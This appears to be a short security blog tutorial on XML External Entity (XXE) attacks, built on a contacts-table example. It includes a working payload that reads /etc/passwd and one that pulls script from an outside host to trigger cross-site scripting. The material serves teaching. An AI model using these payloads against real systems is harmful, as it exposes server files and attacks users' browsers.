XML External Entity attack (XXE) in a Nutshell

The XXE attack has been around for a few years, but hasn’t gotten much attention until the last couple of years with some high-profile cases in Facebook and PayPal.

So, what is the XML External Entity attack? XXE is an abbreviation for XML External Entity. It is a part of the XML spec that allows a document to have entities that resolve to someplace external (not within the same document).

Some basic examples demonstrate the concept describe it best. For example, let’s say that we have a web app that takes as input an xml file and displays it in a table.

Example 1

Here’s a sample input file-

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="utf-8"?>
  <contacts>
    <contact>
      <login>bobw</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

This is processed and displays the following-

loginnameemail
bobwBob Walkerbob@bob.com
ajonesAlice Jonesalice@alice.com

Pretty Straightforward, right?


Example 2

Now, let’s take the same example and add an entity-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo "Foo">
]>
  <contacts>
    <contact>
      <login>&foo;</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

This processes and displays-

loginnameemail
FooBob Walkerbob@bob.com
ajonesAlice Jonesalice@alice.com

What happened? On line 3 of the xml file we created an entity called foo which is the string, “Foo”. We then use that entity, &foo, in place of Bob’s username on line 7. While processing the document the parser substituted “Foo” when it saw &foo;.


Example 3

Now let’s do something really interesting. Consider the following-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
  <contacts>
    <contact>
      <login>&foo;</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

This processes and displays-

loginnameemail
root:x:0:0:root:/root:/bin/bash <redacted>Bob Walkerbob@bob.com
ajonesAlice Jonesalice@alice.com

What did it do? On line 3, the keyword SYSTEM means that this entity reference is external to the document. In this case, the external entity references /etc/passwd on the system that is processing the xml. This causes the contents of /etc/passwd to be pulled into the document and then displayed.


Example 4

Up to this point, the attacks have been against the server. How can we attack the user?
Consider this-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php">
]>
  <contacts>
    <contact>
      <login>&foo;</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

What do you think the external entity reference does here? It returns <script>alert(‘xss’)</script>. When the table displays that script is executed in the browser. (I’m not displaying the results like in previous examples because it would execute while you are reading this and it’s just an example showing that it’s vulnerable.).

I hope these examples give you a basic understanding of what the XXE vulnerability is. I’ll likely do a follow-up post with more advanced examples soon and how to mitigate it soon.

This entry was posted in Security. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *